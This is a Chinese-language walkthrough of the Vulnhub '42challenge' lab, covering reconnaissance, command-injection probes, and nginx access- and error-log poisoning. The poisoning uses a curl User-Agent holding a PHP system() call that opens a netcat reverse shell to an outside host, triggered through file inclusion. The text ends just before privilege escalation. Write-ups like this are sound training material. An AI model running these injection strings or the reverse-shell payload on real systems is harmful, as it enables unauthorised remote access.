近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、Linux ACL访问控制权限等方面的知识,属于不可多得的精品之作,下面就开始这次靶场实战之旅。
一、主机端口探测利用命令arp-scan -l来发现靶机,然后看看靶机开放了哪些端口;
在利用nmap的脚本探测下端口可能存在的漏洞;
二、web渗透获取shell
访问下web看看;
127.0.0.1&whoami、127.0.0.1|whoami、127.0.0.1&&whoami、127.0.0.1||whoami都没有正确返回。后来有新的发现:
1、nginx访问日志getshell
访问日志可以读取到;
写入shell:
curl -A "<?=system('nc -nv 192.168.0.3 8888 -e /bin/bash');?>"
通过文件包含触发反弹;
接收反弹;
2、nginx错误日志getshell
错误日志也可读取到;
写入shell;
通过文件包含触发反弹;
接收反弹;
弹回了shell,下一步就该提权了,也到了本靶场的精华之处,开始提权的漫长之旅。
三、辅助脚本利用有了www-data用户的shell,先尝试下有没有suid提权的可能;
提取码请登录后查看!